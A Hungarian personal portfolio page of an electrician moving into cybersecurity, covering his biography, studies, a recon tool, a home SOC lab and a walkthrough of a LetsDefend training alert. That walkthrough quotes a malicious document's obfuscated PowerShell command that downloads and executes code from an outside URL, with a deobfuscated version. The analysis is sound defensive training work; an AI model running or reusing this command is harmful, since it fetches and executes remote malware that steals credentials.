Rólam, avagy ki is volnék
Azt hiszem egy idézettel kezdeném kedvenc írómtól: „ A sors olyan, mint egy részeges szabász: mikor belevág a szövetbe, még nem lehet tudni: felöltő lesz-e belőle vagy nadrág. ”. Azt hiszem valahogy az én életem is kicsit ilyen...
Elöljáróban annyit, hogy jelen írás formája, fogalmazása és közvetlensége kizárólag figyelemfelkeltés céljából született. A szerző igenis komoly, magabiztos és céltudatos egyéniség. Bízva bízik benne, hogy a kedves olvasó az írás milyenségéből is a szerző rendkívüli kreativitására fog fókuszálni.
1987. november 9-én láttam meg a festői síkságokkal körülvett alföldi város Orosháza szülészeti osztályán a napvilágot. Gyorsan kiderült, hogy igen eleven, de ugyanakkor magának való kisgyerek lesz belőlem: kergettem mindenféle labdákat, hol kézzel, hol lábbal, néha pókokra vadásztam, néha csigákra. Nem akarom mindenki orrára kötni a tapasztalataimat, de csigákat lényegesen egyszerűbb elkapni, mint pókokat... Aztán az izgalmas fiatal gyerekkor után egy informatikai szakközépiskola padjaiban találtam magam, ahol behatóbban megismerkedtem a számítógépek csodálatos világával. Míg fiatalabb koromban csak MS-DOS-szal, kis és nagy floppyval, illetve az akkori szerelmemmel a Grand Prix Circuittal találkoztam, addigra itt már nem csak command line-os operációs rendszert használtam, hanem a windows minden féle fajta változatát.
Összeraktam magamnak az első saját számítógépemet. Elkezdtem programozni (Turbo Pascal, Assembly, Delphi...mondjuk ezekből már kb semmire sem emlékszem), megtanultam hogyan kell használni az Office adta lehetőségeket, és hála a frontpage nevű programnak akkoriban úgy döntöttem, hogy weblapokat szeretnék majd tervezni és készíteni. Így az érettségin a választott tantárgyam az informatika lett. Melyet végül két jó (magyar és töri), és három példás egyenleggel zártam (angol, matek, informatika). Angolból 17 évesen még középfokú nyelvvizsgát is tettem, dacból. Igen...Jól olvasta a kedves olvasó. Dacból. Akkoriban az angol tanárommal nem igazán kedveltük egymást. Szentül hitt abban, hogy aki járt Angliában, annak tudnia kell angolul. Nekem pedig volt szerencsém 3 napot eltölteni abban a fenséges esős országban. Mikor ezt az orromra kötötte, én megkérdeztem tőle, hogy "Mivel Tony Curtis járt Magyarországon egy hetet, akkor neki tudnia kéne magyarul?". Kedvesen reagált egy nevelői intővel. Hogy ne kelljen bejárnom az óráira, és ne kapjak csupa elégtelent vagy elégséges jegyet tőle (a tudásomtól teljesen függetlenül), így meghackelve a rendszert a nyelvvizsgával kiváltottam magam az órái alól. Majd természetesen jó természetű emberként az orra alá dörgöltem.
Érettségi után mivel jobb ötletem nem volt, csak azt tudtam, hogy szeretnék az informatika világa körül mocorogni (mindig csodáltam azokat az embereket, akik 18 évesen tudják, hogy mivel szeretnének a következő 40 évben foglalkozni...hát nekem lövésem sem volt). Felvetettem magam a Széchenyi István Egyetem Mérnök Informatika szakára. Viszont akkoriban sok magánéleti problémával küzdöttem és a C nyelven való programozás sem igazán volt kompatibilis az agyam működésével, így egyetemet váltottam. Csalódva magamban és az informatikai tudásomban, igyekeztem egy teljesen más irányba indulni, így fordultam az akkori másik olyan terület felé, ami egyáltalán érdekelt, a meteorológia felé. Ami azért mókás, mert a meteorológiának 80%-a megint a számítástechnikához fűződik...Szóval ismét a számítógép előtt találtam magam. Ezúttal sokkal jobban ment a suli, megtanultam egy új programozási nyelvet, a Fortrant. Viszont a 6. félévemre világos lett, hogy sajnos a kémiához teljesen analfabéta vagyok. Mondhatni képlettudatlan. Szóval hosszas vívódás után, és egy negyedééig kész szakdolgozat után ezt az egyetemet sem fejeztem be.
A kedves olvasó most bizonyára azt a következtetést vonhatta le magában, hogy nem vagyok túl kitartó. Ami bizonyos szintig igaz is (senki sem tökéletes), de szerencsémre azóta sokat változtam, és rengeteg olyan dolog van az életemben, amit hosszú idő óta csinálok, még akkor is, ha néha vannak bennük kisebb nagyobb kihagyások. Például 20 éves korom óta gitározok, több, mint 10 éven át kungfuztam és a feleségemmel is 13 éve vagyunk együtt (bár ez valószínűleg nem az én érdemem elsősorban). Imádok olvasni (főként Rejtő Jenőt), vezetni és bütykölgetni ezt azt.
Ha már bütykölés. 4 évvel ezelőtt úgy döntöttünk a feleségemmel, hogy leteszteljük a házasságunkat és belevágunk egy ház felépítésébe. Mivel akkor már több, mint 3 éve villanyszerelőként dolgoztam, így racionálisnak tűnt, hogy olcsóbban kijövünk ezzel az opcióval és igazunk is lett, csak a side effect-ekkel nem számoltunk. Lényeg, ami lényeg, gyakorlatilag ketten apósommal építettük fel a házat, egy tetemes részét teljesen egyedül. Fél év alatt szinte megtanultam a kőműves szakmát, sikerült lekörözni néhány burkolót, akinek láttam az évek folyamán a munkáját. Csodálatos függőleges falakat építettem és habár tagja vagyok a Derékszög tagadók csoportjának, bizony meg merem kockáztatni, hogy elhanyagolható hiba mellett a háznak vannak részei, ahol a falak 90 fokot zárnak be egymással (példaként említeném, hogy az házunk alaprajza egy sima téglalap, és a két átló hossza között 2 cm! az eltérés). Nem is hinné az ember, ha nem tapasztalja, hogy mennyi tudás kell egy ház felépítéséhez. De a házunk elkészült, én pedig rengeteg hasznos tudásra tettem szert. A 7 év, amit az építőiparban eltöltöttem rendkívül kreatívvá tett, rengeteg problémát kellett napi szinten megoldanom. Sosem a problémát láttam, hanem egyből próbáltam megtalálni rá a megoldást. Minden munkából próbáltam a maximumot kihozni, hogy ne csak technikailag legyen tökéletes, de még szép is legyen. Szeretek szép és precíz munkát kiadni a kezemből. Amire büszkén tekinthetek vissza, és büszkén mondhatom, hogy az az én kezem munkája.
Karrierváltás és motiváció
Öt év villanyszerelés és egy ház felhúzása után, ha teljesen őszinte akarok lenni, akkor egy picit belefáradtam ebbe a területbe. Szeretem. De nem szerelem.
Így jutunk el oda, hogy miért szeretnék területet váltani. 2024 karácsonykor becsípődött a derekam egy félig fokatlan létrának hála és amíg egy infúzión keresztül kaptam a fájdalomcsillapítót, azon méláztam, hogy akarom-e én ezt 60 évesen is csinálni...Pont ezen gondolatmenet közben a facebook feldobott egy videót, amiben Ryan Montgomery mesél arról, hogy mikre képes egy flipper zero-val. Érdekesnek tűnt, szóval gondoltam, hogy kicsit utána olvasok a dolognak. Korábban már hallottam az udemy nevű oldalról. Épp karácsonyi leárazás volt és rákerestem, hogy mégis mi a franc ez az etikus hackelés. Mivel épp volt fölös 10 euróm, így úgy gondoltam, hogy benevezek egy ilyen kis tanfolyamra. És azt hiszem ez volt életem egyik legjobb döntése.
Egyből éreztem, hogy ez az, amivel szeretnék foglalkozni. Ez az, amit szeretnék csinálni 40 éven át. Ez szerelem.
Már akkor januárban jelentkeztem az Óbudai Egyetem Kiberbiztonsági Mérnök szakára, pár hónapra rá újracsináltam az informatika érettségit emelt szinten, és így levelező tagozatra fel is vettek (dolgozni azért még kell ugye...). 2025 szeptemberében megkezdtem az itteni tanulmányaimat, majd idén (2026) januárjában végigcsináltam egy Etikus Hacker képzést is itt az egyetemen, melynek majd idén októberben lesz foganatja egy CEH vizsga keretein belül.
2024 karácsonya óta sokat finomodott, hogy pontosan mit is szeretnék, így, hogy egyre jobban megismertem ezt a területet. Nagyon beszippantott a bug bounty világa, illetve nagyon érdekel a másik oldal, a SOC analyst része is és természetesen maga az etikus hackelés része is.
Hát így jutottam el a mai napig. A tapasztalataimról, a jelenemről és a jövőbeli terveimről pedig a többi menüben olvashattok...Jó szórakozást!
A Múlt
Az egyetemek után rengeteg munkahelyem volt, kezdetnek számviteli előkészítő voltam (senkinek sem ajánlom...túl szép munka ahhoz, hogy bárki ezzel foglalkozzon napi 8 órában), fél évre rá már biztosításokat árultam telefonon (szintén fenomenális időtöltés)...majd másfél éven át garázskapukat szereltem össze, végül stadionokhoz csináltunk tartóoszlopokat az éppeni kollégáimmal. Szerencsémre egy vádliszakadás ezt a csodálatos karriert is derékba (vagyishát vádliba) törte. Ahogy szokás mondani lassan csak akasztott ember nem voltam.
Végül mivel az embert a természet úgy alkotta meg, hogy táplálék nélkül huzamosabb ideig sajnálatos módon nem képes létezni, így kapva kaptam az alkalmon és csatlakoztam apósom brigádjához. Itt a brigádon belül bedobtak mindenki mellé, egyik nap burkoló mellett dolgoztam, másik nap a festők mellett, harmadik nap a villanyszerelő mellett, negyedik nap pedig a vízszerelőknek segítettem. Ekkor döntöttem úgy, hogy elvégzem a villanyszerelői képzést, melyet 2019 március 31. napján végeztem el.
Másnap (április 1) már munkába is álltam a HOTTA Green Energy Magyarország nevű cégnél, kollégákkal jókat röhögtünk, hogy én vagyok a cég áprilisi bolondja számukra. Aztán 3 év lett belőle...Szép kis áprilisi bolond mondhatom... Szóval nekik hála tanultam meg igazán a szakmát, rendkívül jó tanáraim voltak. Fegyelmezetten, precízen, szépen dolgoztunk. Ha bármi hibám volt, megbeszéltük, hogy miért nem jó, hogyan kellett volna és legközelebb már úgy csináltam. Egy év után már bonyolult elosztókat csináltam, amelyek teljes társasházakat, irodaházakat üzemeltettek a nap 23 óra 56 perc 4 másodpercében (igen...imádom a csillagászatot is). Rendkívül sok változatos projectben volt szerencsém részt venni. A családi házaktól, teljes irodaházakig, szervertermekig mindenféle munkákat csináltunk.
Aztán teltek múltak a napok, egyre több munka szakadt először a hármunk, majd a négyünk nyakába, és ott tartottunk, hogy már alig volt szabad hétvégém, alig voltak olyan péntek estéim, amikor nem egy földalatti elosztóhelységben kötöttük épp át a betápját egy szekrénynek, vagy tartottuk épp karba. Semmi szabadidőm nem volt már mellette. Ekkoriban hagytam abba a kungfut is, pedig imádtam...Miket írok...Imádom. És még biztosan folytatni is fogom. Szó mi szó...három év után egyszerűen elegem lett. Elegem lett belőle, hogy semmi másra nincs időm, elegem lett a környékből, ahol laktunk (8. kerület) és tennem kellett valamit. Így felmondtam és kiköltöztünk Letkésre, ahol két év alatt felépítettem egy házat.
A ház felépülte és a beköltözésünk után ismét visszatértem a "teljes értékű" munkához, elszerződtem a Loxvill Épületautomatizálás Ésszerűen Kft nevezetű céghez, akik főleg okosotthonokkal foglalkoznak. Itt már egy kollégámmal ketten felújítottunk egy komplett irodaházat körülbelül fél év alatt (nem nagyot, 3 szintest...de attól még irodaház...). Végül egy év után a cég nem nagyon kapott megkereséseket, és több kollégámtól is megszabadultak. Nekem felajánlották, hogy maradjak, de végül úgy döntöttem, hogy elhagyom ezt a céget is. Nem éreztem túl stabilnak a helyzetet.
Mindezek mellett 2025 eleje óta folyamatosan képzem magam mind a kibervédelemben, mind a támadó technikák megismerésében. Közben segítettem felépíteni a nővéremék házát, a sógornőmék házát és elérkeztünk a jelenhez. Szóval nem szeretek unatkozni...
Villanyszerelő
2019 – 2025
- Nagyszabású infrastrukturális projektek (adatközpontok, Vodafone)
- Elektromos elosztó rendszerek építése és telepítése
- Strukturált és alacsony feszültségű kabelezés
- Szünetmentes tápellátási (UPS) hálózatok megvalósítása
- Napelemes rendszerek
Projektek
Kiemelt munkák
- Budapest Polgármesteri Hivatal Teljes szárnyának felújítása
- 75 lakásos Ökoépület villanyszerelése
- BVOP Steindl Imre utcai felújítása
- Katonai Nemzetbiztonsági Szolgálat elosztók felújítása, telepítése
- Gyáli Eisberg gyár 2000m² napelem park kiépítése
- Vodafone szerverpark teljes kiépítése UPS hálózattal és dízel aggregátorokkal támogatva
Szerzett hasznos tudás
Készségek
- Problémamegoldás
- Kreativitás
- Rendszerben való gondolkodás
- Rendszerek átláthatóságára való törekvés
- Precíz, pontos munkavégzés
- Csapatban és önállóan végzett munka
- Kommunikációs képességek fejlődése (megrendelőkkel való kommunikáció)
- Kritikus gondolkodás
- Időmenedzsment fontossága
- Proaktivitás
- Reziliencia
A Jelen
Elérkeztünk ezen a rendkívül izgalmas és felemelő úton a jelenhez. Jelenleg saját magam beosztottja vagyok, saját magam fizetem a kötelezettségeimet. A szabadidőm 80%-át pedig tanulással töltöm, az elmúlt egy évben az alábbi platformokon gyakoroltam és tanultam a főiskola mellett: HackTheBox, PortSwigger Academy, Cisco Networking Academy, APISec University.
Nemrég megismerkedtem a LetsDefend akadémiájával is, ahol elindultam a SOC Analyst path rögös útján, illetve készülök a CEH októberi vizsgájára. Az elmúlt másfél évben rengeteget tanultam a különböző támadási mechanikákról, programokról (nikto, dirbuster, nuclei, nmap stb.), hogy melyik mire jó, mit tud meg belőle az ember és merre indulhat belőle. Én is használtam a legtöbbet laborkörülmények között, de éles helyzetekben is, bug bounty közben. Érdekes látni a saját webszerveremen, hogy mennyire jól látszanak a logokban és, hogy mekkora "zajt" csapnak.
Ezért is fókuszálok most erre a területre. Mivel ismerek egy csomó technikát, és hogy mi mihez vezethet, illetve nagyon érdekesnek tartom magát az egész területet (mintha nyomozó lenne az ember), ezért is szeretnék leginkább ebben a körben elhelyezkedni.
Önfejlesztés
Aktívan zajló tanulás
- Bug Bounty programok (Intigriti, HackerOne, YesWeHack)
- Web application, Wildcard tesztelés
- Penetrációs tesztelés (HackTheBox)
- Hálózatelemzés és monitoring (Wireshark)
Szerzett hasznos tudás
Megismert sebezhetőségek, folyamatok
- SQL Injection
- Cross-Site Scripting (XSS)
- CSRF sérülékenységek
- IDOR
- API tesztelés
- SSRF
- Logikai, üzleti hibák
- CORS
- XXE
- Http request smuggling
- Oauth (2.0 is)
- File feltöltés
- JWT
- Clickjacking
- Útvonal módosítások
- Authentikációs technikák
Megismert eszközök
Eszközök & Linux
- Caido
- Nmap, Naabu
- Nuclei
- Metasploit framework
- Linux: Kali, Arch, Ubuntu
- Ffuf, Katana, Dirbuster, Gobuster
- És még sorolhatnám
A Jövő
Ezek a területek érdekelnek leginkább: SOC Analyst, Ethical Hacker. Így ezekben a pozíciókban szeretnék elhelyezkedni. Bárki, aki olvassa ezeket a sorokat és ismer szabad pozíciót ezekben a körökben, feltétlenül keressen meg!:)
Rövid Távú Célok
2026-2027
- CEH tanúsítvány
- Bug bounty sikeres találatok növelése
- LetsDefend SOC Analyst path befejezése
- InScop3 projekt fejlesztése, új projektek kitalálása
- L1 SOC Analyst állás megszerzése
Hosszú Távú Célok
2027+
- CompTIA Security+ megszerzése
- CISSP megszerzése
- L2 majd L3 SOC Analyst állás
Fejlesztendő Területek
- Cloud biztonsága (AWS, Azure)
- Blockchain és kriptográfia
- AI/ML biztonsági alkalmazások
- Zero Trust Architecture
- Angol nyelv beszéd készség
- Egyébként meg minden is...
Projectek
InScop3 - Security Framework
Az InScop3 egy saját fejlesztésű Python progi, amelyre akkor gondoltam először, mikor ráfókuszáltam bug bounty-k során a wildcardok vizsgálatára. Ugyanis ahhoz, hogy kinyerhesd egy wildcard minden subdomainjét, hogy azok közül melyik élő, stb, ahhoz le kell az embernek futtatnia 4-5 programot (subfinder, httpx, dnsx stb.). Mindet külön külön beállítani, ha kéri a BugBounty, akkor Header-eket hozzáadni, rate limitet beállítani. És arra gondoltam, hogy mennyivel egyszerűbb lenne, ha én csak megadom ezt a 4 bemeneti értéket (wildcard, rate limit, User-agent, Request-header), és egy program megcsinálja helyettem az egészet, majd grafikusan kiadja a végeredményt. Aztán útközben arra gondoltam, hogy mi lenne, ha vizsgálná, hogy mely subdomaineken lehet esetleg takeover-t csinálni. Szóval beletettem azt is...Aztán gondoltam, hogy milyen jó lenne, ha lehetne különböző vizsgálatokat csinálni 1-1 subdomain-en... Például egy nuclei-t, vagy egy ffuf-ot futtatni. És végül "belepakolgattam" ezeket a programokat is. Valójában a program csak annyit csinál, hogy nyit egy terminált a háttérben, beírja a parancsot, ha adtál meg bemeneti adatokat (pl rate limitet), akkor azokat beállítja. Pár egérkattintással beállíthatsz mindenféle plusz kapcsolót, majd az indításra kattintva lefuttathatod a toolt.
Majd arra gondoltam, hogy milyen jó lenne, ha lenne egy jegyzet, amibe beleírhatnám az összes dolgot, amit találtam és ez is a program része lenne. És aztán ahogy jöttek a gondolatok, úgy építettem bele őket a programba.
Ha gondolja a kedves olvasó, hogy tenne vele egy próbát, akkor itt megtalálja (dolgozok egy windowsos verzión is, egyelőre csak linuxra van):
→ GitHub-on megtekintés ↓ Letöltés a szerverről (.tar.gz)SOC Homelab felállítása
Hol is kezdjem. Sokat gondolkodtam, hogy hogyan is szeretném ezt az itthoni "labort" kivitelezni. Szerettem volna egy profi, itthoni kis webszervert létrehozni, amiről futtathatom ezt a weboldalt, későbbiekben talán a feleségem weboldalát is, ami ugyanakkor megfelelően védett is (remélem ebből a szempontból jól sikerült a project). Utánaolvastam, videókat néztem meg, végül az alapfelállás az lett, hogy lesz egy fő tűzfalam (pfSense), mögötte egy WAF (SafeLine) és az egészet egy SIEM-mel (Wazuh) fogom monitozorni. Szóval belevágtam.
Az ember úgy is a saját kárán tanul...
Szóval az alaprendszer egy sima Arch linux, melyre virt-managerrel létrehoztam 2 virtuális gépet. Az egyiken a pfSense fut, a másikon egy ubuntu szerver. Az ubuntu szerverre felkerült a safeline (dockerekre) és a wazuh. Hát mit ne mondjak...nem volt egyszerű történet. A pfSense-t vagy 5x újratelepítettem (bár így utólag nézve egyszer sem kellet volna...), az ubuntu szervert is vagy háromszor (nem nagyon akart rajta működni a net...de legalább megtanultam, hogy ez nem az ő hibája volt, hanem az enyém, meg a rosszul beállított pfSense-é), mire sikerült eljutni oda, hogy minden klappoljon és fel lehessen telepíteni a safeline-t és a wazuh-t.
Működött is szépen a dolog, habár a safeline dashboardja alaphangon kínai és nincs saját angol felülete (vagy én voltam balf@sz hozzá, hogy működésre bírjam). Viszont nekem ez a rózsaszín (vagy lazac vagy milyen) színű blokkolási kép ez nekem annyira nem jött be, plusz a kínai kezelőfelület sem tetszett túlságosan (ráadásul az igazi finomságok, a finomhangolási beállítások már fizetősek). Szóval kicsit utána néztem, hogy mit is használnak a "profik". És aztán úgy döntöttem, hogy a kiválasztott a Coraza lesz. Szóval ismételten AI segítséggel felcsaptam a coraza-t az ubuntura, kicsit átállítottuk a rendszert, átírtam a wazuh besorolási szabályait, és ismét működött a rendszer.
Most, hogy már szépen működött a WAF logolása, a Wazuh szépen olvasta a logokat, és "severity" alapján be is sorolta őket (ezekkel rengeteget szívtam mire működött), már csak egy lépés volt hátra. A cloudflare blokkolásait is szerettem volna, ha olvassa a wazuh. Ehhez külön python scriptet kellett írni, és beállítani hogy pár percenként lefuttassa a rendszer automatikusan. Végül ezt is sikerült összehozni. Következő projekt az lesz, hogy a Wazuh-t úgy beállítani, hogy felismerje a támadásokat, pl ha a támadó futtat egy gobustert, vagy egy nuclei-t, akkor felismerje, esetlegesen automatikusan blokkoljon ip-ket és hasonló nyalánkságok...
Közben hála egy francia (feltehetőleg) botnak (aki ráküldött a weboldalra egy CVE-2017-9841 vizsgálatot...kár, hogy nincs php a weboldalon...na majd legközelebb) sikerült pfSense-en belül létrehozni egy Wazuh Block listát. És, hogy hogyan? A Wazuh Active Response nevű kis funciójával. Pontosabban: Először a rendszer logokat gyűjt és dekódol (mezőkre bontja, amivel ki lehet nyerni az támadó ip címét). Majd a beállított szabályok alapján (pl ha elér egy kritikus severity-t a támadás, vagy mondjuk ha 1 másodpercen belül hirtelen sok kérés érkezik), akkor aktivizálódik ez az Active Response és elindít egy egyedi scriptet. Ezzel a scripttel pedig parancsot adunk a pfSense-nek, hogy az átküldött ip címet tegye szépen tiltólistára egy meghatározott időre. Kíváncsian várom, hogy legközelebb hogyan reagál a szerver.
SoC Event megoldás
Miután július 22-én megszereztem a LetsDefend SOC Analyst Learning Path certificate-jét, pár napra rá kaptam egy emailt:
Gyanítom, hogy ez az email egy automatikus email, de mivel szeretek másoknak segíteni és mert ez is a feladat része, így eleget teszek a kérésnek...Íme az én megoldásom, gondolkodásom a LetsDefend 76-os számú eventjére.
Gyanítom, hogy aki csinálgatja ezeket az eventeket, azoknak megvan, hogy hogyan kell elkezdeni a folyamatot, így most erre nem térnék ki, inkább a logikára.
Nézzük először magát a report leírását.
Az első, amit mindig megcsinálok, hogy kimásolom a hash-t és irány a virustotal. Ha te is megteszed, láthatod, hogy a fájl a virustotal szerint nagyon is malicious.
Én ilyenkor kíváncsiságból mindig meg szoktam nézni, hogy mit is csinál maga a program, milyen commandokat hajt végre, hogyan néz ki a process tree-je, megpróbálom megérteni, hogy mit csinál a malware.
Látszik, hogy a progi fogja és a winword (mivel ugye egy .doc fájlról van szó, amiben makrók futhatnak) megnyitása után rögtön indít egy powershellt:
"powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'stri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))"
Itt ugye a támadó próbálja kikerülni a különböző antivirusok pattern felismerő automatikáját ezzel a rengeteg karakterrel. Ez lecsupaszítva így néz ki:
"powershell IEX (New-Object System.Net.WebClient).DownloadString('https://filetransfer.io/data-package/UR2whuBv/download')"
Vagyis megpróbál letölteni egy fájlt. Ezt eljátssza még kétszer. Hogy miért? hogy kijátszhassa a védelmi rendszert...És, hogy hogyan, az a shell commandokból derül ki:
Íme a lefutott Commandok. Nézzük mit tesz a malware. Első lépésben ugye letölti a fájlt. Aztán a RegAsm.exe, a netsh.exe és a MSBuild.exe segítségével kijátssza a védelmi vonalakat (átírja a registry-ket és hasonlók), majd végezetül adatokat lop (NirSoft.exe -->ezzel kinyeri, browser.txt--->ebbe pedig elmenti), böngésző adatokat. Felhasználói neveket, jelszavakat.
Menjünk tovább. Ha elindítod a "create case" nyilakkal az eventet, akkor a következő, ami felugrik az ez lesz:
Én itt az "other"-re mentem, mert szerintem az első és a harmadik is megállja a helyét. A következő kérdés:
Kérdés, hogy karanténba lett-e helyezve? Ezt onnan tudhatod, hogyha visszakattasz az Investigation channelbe, ott megnézed, hogy mi szereoel a Device action sorban értékként.
Blocked. Tehát a tűzfal sikeresen megfogta, és karanténba helyezte. --->Quarantined. Következő kérdés:
Erre a választ a log management-ben találod (félig meddig)...De hogy találhatod meg a log managementben? Az event leírásában szerepel ugye source ip, file hash. Szóval két irányban is el tudunk indulni...néztük ugye a virustotalon a fájlt. Itt megtalálod a fájl nevét, ami "INVOICE PACKAGE LINK TO DOWNLOAD.docm". Rákereshetsz erre is, de én ezt nem találtam, így rákerestem a source ip-ra, ami ugye 172.16.17.37.
Erre már kiadott három találatot is. Szóval ha lenyitod őket, akkor megnézheted egyenként is.
Ha megnézed a logokat láthatod, hogy március 7-én volt mindhárom esemény (a mi eseményünk március 14-én türtént...szintén az event leírásánál van), tehát a logokba nem került be. A másik, amit én itt megnéztem, az az Endpoint securityben maga a gép volt.
Itt van egy olyan menü, hogy Terminal history...Ha arra rákattintasz látni fogod, hogy milyen parancsok lettek beütve a terminálba.
Ha ezt megnézed elég gyanús dolgok történtek itt...
Én ebből arra következtettem, hogy a gép fertőzött lehet. Viszont ezek a parancsok március 7-én futottak le, vagyis a mi Eventünk szempontjából lényegtelenek lehetnek (de össze is függhetnek). Azért karanténba csaptam a gépet. Miért? Mert felettébb furcsa nekem ez a terminál és szerintem jobban meg kéne vizsgálni ezt a gépet. Ha megnézed a Last login értéket, akkor láthatod, hogy március 7-én léptek be utoljára. Ami ugye nem zárja ki, hogy azóta bárki kikapcsolta volna ezt a gépet. Tehát lehet, hogy valaki korábban letöltött rá valamit, amit nem kellett volna és lehet, hogy ez a program eddig lappangott, de most aktivizálta magát és megpróbálta letölteni azt a fertőzött doc fájlt, ami a mi evetünk része. Szóval mivel túlbuzgó vagyok és hiszek a zero trusban, így átnéztem a gép böngészési előzményeit is..
Illetve lecsekkoltam, hogy a logokban március 7-én történt dolgok milyen url-ekre mutatott...
Minden esetre a mi eventünknél, ami március 14-én történt, annál semmilyen log nem keletkezett, semmilyen C2 access nem volt, így Not Accessed.
Következő kitöltendő rész az "Add Artifacts". Itt hozzáadsz mindent, amit eddig találtunk...
Majd lezárhatjuk az alertet.
És ha mindent jól csináltunk, akkor te is ezt fogod kapni:
Írhatsz hozzá leírást, sőt valós környezetben én is írtam volna, de mivel ez teszt környezet, így nem láttam fontosságát.
Ettől függetlenül imádom ezeket. Olyan, mintha az ember nyomozó lenne...Bár...végül is ez igazi nyomozómunka.
Projekt Célok
Ütemterv
- Wazuh finomhangolása
Tesztelés
- Tesztelése a saját labornak
- Penetrációs tesztelés (nuclei, gobuster stb.)
- Wazuh log elemzés
- Auditálás, javítás
Kapcsolódj
Szeretnél velem kapcsolatba lépni? Nyitott vagyok új lehetőségekre, állásokra, kérdésekre és kollaborációkra. Itt tudsz elérni:
Közösségi Média & Platformok
Legyen szép napotok!